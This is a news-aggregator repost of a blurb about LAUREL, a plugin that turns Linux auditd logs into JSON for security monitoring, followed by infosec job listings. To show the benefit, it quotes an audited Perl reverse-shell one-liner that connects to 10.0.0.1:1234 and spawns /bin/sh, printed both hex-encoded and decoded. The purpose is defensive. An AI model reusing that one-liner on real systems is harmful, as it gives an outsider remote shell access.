all InfoSec news
Laurel - Transform Linux Audit Logs For SIEM Usage
July 26, 2022, 12:30 p.m. | noreply@blogger.com (Unknown)
KitPloit - PenTest Tools! www.kitploit.com
LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups.
Why?
TLDR: Instead of audit events that look like this…
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
…turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}
This happens at the source. The generated event even contains useful information about the …
audit auditd laurel linux logs plugin ruleset rust siem tracking
More from www.kitploit.com / KitPloit - PenTest Tools!
Radamsa - A General-Purpose Fuzzer
3 days, 8 hours ago |
www.kitploit.com
Sr2T - Converts Scanning Reports To A Tabular Format
5 days, 8 hours ago |
www.kitploit.com
Jobs in InfoSec / Cybersecurity
Information Technology Specialist II: Network Architect
@ Los Angeles County Employees Retirement Association (LACERA) | Pasadena, CA
Cybersecurity Skills Challenge -- Sponsored by DoD
@ Correlation One | United States
Security Operations Center (SOC) Analyst
@ GK Cybersecurity Group | Remote
Technical Writer Cybersecurity (Clearance Required)
@ ICF | Virginia Client Office (VA88)
Threat Management & Intelligence Expert (m/f/d)
@ METRO/MAKRO | Düsseldorf, Germany
IT Security Manager
@ Deutsche Telekom IT Solutions Slovakia | Košice, Slovakia (Slovak Republic)